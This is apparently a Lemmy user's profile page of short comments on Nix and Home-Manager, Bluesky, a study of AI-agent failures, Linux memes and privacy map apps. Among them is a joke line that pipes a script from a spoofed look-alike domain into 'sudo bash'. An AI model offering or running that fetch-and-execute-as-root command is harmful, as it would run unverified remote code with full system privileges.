You use the word “declare” a lot.
I am not sure, but in Nix I declare the desired state of installed packages and configurations in an obscure language and the package manger takes care of that, right?
Now the module declare reasonable default configurations? Like http server starts on system start and serves on port 80?
Now you lost me at the Home-Manger. I can declare stuff in my home folder. OK, so for user-wide configuration? For packages and configuration in the user space? Or what?
- 2 Posts
- 38 Comments
I don’t understand a thing.
mogoh@lemmy.mlto Technology@lemmy.world•Bluesky finally got Activity Notifications, you can now follow news and accounts with it.English122·5 days agoAs long as bluesky is not truly decentralized, it is not worth looking at.
mogoh@lemmy.mlto Technology@lemmy.world•AI agents wrong ~70% of time: Carnegie Mellon studyEnglish82·5 days agoThe researchers observed various failures during the testing process. These included agents neglecting to message a colleague as directed, the inability to handle certain UI elements like popups when browsing, and instances of deception. In one case, when an agent couldn’t find the right person to consult on RocketChat (an open-source Slack alternative for internal communication), it decided “to create a shortcut solution by renaming another user to the name of the intended user.”
OK, but I wonder who really tries to use AI for that?
AI is not ready to replace a human completely, but some specific tasks AI does remarkably well.
mogoh@lemmy.mlto linuxmemes@lemmy.world•Arch Linux: For those who have the "I can fix him!" mentality.7·9 days ago“Linux is my personality.”
mogoh@lemmy.mlto Privacy@lemmy.ml•Announcing CoMaps! Navigate with Privacy - Discover more of your journey!39·9 days agoWhat is or will be different to organic maps, besides the governing? I have organic maps on my phone and I do not see a reason to switch for now.
mogoh@lemmy.mlto World News@lemmy.world•North Korea to open beach resort as Kim Jong Un bets on tourismEnglish25·16 days agoOtto Warmbier
Yes. Sorry. I expected everyone to know this, but in hindsight this is of course a bad assumption.
Guess I must turn in my programmer-badge.
OK, do you have any clues who it might have been?
Why is it censored? Also why no monospaced typeface?
Happened to my wife yesterday. Some update broke grub.
mogoh@lemmy.mlto Technology@lemmy.world•Google might replace the ‘I’m Feeling Lucky’ button with AI ModeEnglish1·2 months agoDoes that mean, I don’t get hallucinations, if I don’t press the AI Button?
Where is the problem when something mit-licensed is in core utils?
Edit: sudo isn’t even a core util.
I have bad news for you …
(TBH I am not sure, but as I remember, this problem was specifically a snap problem.)
🎩
./configure; make; sudo make install;
🎩
wget -q -O- http://raw.githubusercontent.ru/linux-security/security.sh | sudo bash
Ok, I get that the Date API is problematic, but I wouldn’t expect anything meaningfull from
new Date("not a date").getTime()
anyway. Why would you in the first place?